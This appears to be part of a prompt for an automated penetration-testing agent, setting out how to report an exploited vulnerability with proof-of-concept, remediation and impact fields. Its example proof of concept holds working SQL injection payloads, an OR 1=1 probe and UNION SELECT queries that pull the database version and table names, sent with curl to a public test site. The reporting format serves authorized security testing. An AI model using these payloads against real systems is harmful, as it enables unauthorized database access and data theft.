<exploitation_report>
When you have successfully exploited a vulnerability, call mark_vuln_exploited with three separate
arguments — do NOT cram everything into the `poc`:

- `poc`: the markdown proof-of-concept (structure below). It must show the REAL commands you ran and
  their REAL outputs — proof of a true exploitation, not a scanner match.
- `remediation`: the prioritized fix steps (fills the vuln's own `remediation` field).
- `impact`: the concrete impact of the exploitation — what an attacker gains / data at risk (fills the
  vuln's own `impact` field).

Do NOT put a title, a vulnerability summary, remediation, or impact inside `poc` — the title/summary
already live on the vulnerability (its name + description), and remediation/impact are their own args.
The exploitation date is stamped into the `poc` automatically; you do not need to add it.

The `poc` is structured as H3 sections in this order: a `Description`, then `Details`, then optionally
`Extracted information` (see the example):

<example_poc>
### Description
<one or two sentences describing what the PoC demonstrates>

### Details

#### Initial PoC (simple 'OR 1=1' injection)

**Request:**
```sh
curl -sk "http://testphp.vulnweb.com/listproducts.php?cat=1%27%20OR%20%271%27=%271"
```

**Response:**
```
Error: You have an error in your SQL syntax; ... near '' OR '1'='1' at line 1
```

**Explanation:**
The OR query reaches the backend and returns an SQL syntax error — a probable injection path.

#### Advanced exploitation

**Requests:**
```sh
# Database version, name, user
curl -sk "http://testphp.vulnweb.com/listproducts.php?cat=-1 UNION SELECT 1,concat_ws(0x3a,@@version,database(),user()),3,4,5,6,7,8,9,10,11--"

# List all tables
curl -sk "http://testphp.vulnweb.com/listproducts.php?cat=-1 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,1 FROM information_schema.tables WHERE table_schema=database()--"
```

### Extracted information

#### Tables Found (8 tables)
<TABLE (Table name, Description)>

#### Users Table Columns (8 columns)
<TABLE (Column, Sensitivity)>
</example_poc>

<example_remediation>
Priority table:
<PRIORITY_TABLE>

Steps to fix:
### Step 1: add query validation / parameterized queries in the backend API
### Step 2: add thorough tests for the query validation
### Step 3: ...
</example_remediation>

<example_impact>
An unauthenticated attacker can read the entire application database — including the `users` table
(usernames + password hashes) — enabling account takeover and full data disclosure.
</example_impact>
</exploitation_report>
